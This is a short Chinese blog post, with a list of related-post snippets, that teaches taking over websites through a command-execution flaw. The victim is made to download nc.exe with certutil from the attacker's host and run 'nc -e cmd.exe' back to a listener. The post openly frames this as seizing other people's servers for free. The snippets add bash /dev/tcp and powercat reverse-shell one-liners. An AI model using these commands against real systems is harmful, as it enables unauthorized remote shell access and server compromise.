一种拿站方法(利用netcat反弹shell)

于 2025-04-14 23:08:31 发布
阅读量552 收藏 1
点赞数 20
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_89352757/article/details/147234761
版权

今天我想分享一下最近了解到的一个白嫖方法(滑稽),就是利用netcat反弹对方的shell

首先我们了解一下windows防火墙的一些机制,它对出站的数据管控非常宽松,而对于入站的数据管控非常严格,所以我们可以通过命令执行漏洞来上传一个nc(netcat)的exe(这里是针对于windows)文件,再利用nc的shell反弹功能白嫖对方服务器。

这是netcat关于windows版的下载地址  netcat 1.11 for Win32/Win64 

首先,对于一些存在命令执行漏洞的网站,我们可以利用我们自己搭建的网站(经费在燃烧,当然,我并没有开通一个网站),通过命令下载我们自己服务器的nc.exe

certutil -urlcache -split -f http://www.hahaha.com/nc.exe nc.exe

如果对方下载成功并命名为nc.exe,我们就可以通过命令执行使用nc反弹shell了

 nc -e cmd.exe 自己搭建的网站的ip 端口号 (假设为1234)

然后我们在自己的服务器上面使用nc监听1234端口,其实我们应该先将反弹shell的命令写好但先不执行,先执行监听命令

nc -lvp 1234

监听之后就是这样的,我要本地主机与虚拟机演示一下

 

 

 

 

 

 

所以呢,这就是反弹shell,就到这里了,其实我们可以去找一些在线靶场搞一下(菜汪),白嫖一下,但是我并不建议大家这么搞哦。 

跃-迁
关注
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 921
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
netcat使用及反弹shell
Bu2n的博客
02-20 6090
Netcat 的反向连接与反弹 Shell
Kali与编程
02-17 1668
在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。假设我们要在目标主机上执行一个连接程序,连接到攻击者主机的IP地址为192.168.1.100,端口号为1234的监听程序,并执行一个shell。在目标主机上执行连接程序,并连接到攻击者主机的监听程序。
Netcat反弹shell
Yy10205473的博客
01-14 681
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景 某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。 基础介绍 将liunx系统下的bash(shell)传递到window系统下的pc 反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1 liunx主机连接window主机 bash -i :已交互模式运行bash she
使用 `nc` (netcat) 进行 shell 反弹
最新发布
suanfa_student的博客
02-15 148
ncnc。
netcat 反弹shell
weixin_40328085的博客
09-18 405
一种情况:用 bash -i 客户机:netcat -l -p 7777 服务器(被黑主机):bash -i >& /dev/tcp/192.168.227.1/7777 0>&1 >& 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道) 0&gt...
netcat反弹shell
qq_56414082的博客
08-11 419
在执行命令漏洞,一般的利用漏洞是执行反弹shell在进行其他操作。执行反弹shell的命令有许多。反弹shell因为是受害者,反向连接远程服务器,请求是内部到外部,所以防火墙是不会进行拦截的。
网络安全反弹Shell
小飞的博客
04-12 1972
在网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1553
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
常见的反弹shell方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
【工具】Netcat(2)反弹shell
爱美食的Geek
02-21 3033
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符>&,如果在其后加文...
提权(2), Netcat反弹shell
探测???
12-03 404
Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作。
内网安全反弹shell
8888的博客
09-10 1910
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
反弹shell方法和场景
weixin_45653478的博客
04-01 1973
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
反弹shell常见方法总结
qq_45746681的博客
10-08 900
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1409
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
NetCat反弹shell
qq_64177395的博客
11-04 614
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通过NC可以进行端口扫描、 反弹Shell、端口监听和文件传输等操作
一句话反弹shell
12-28
一种常见的一句话反弹Shell的方式是利用`bash`配合网络连接工具如`telnet`或`nc`(Netcat),可以构建简单的反向Shell连接[^1]。 #### 示例代码 下面是一个基于Linux/Unix环境下的简单Python脚本示例来创建一个反向...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值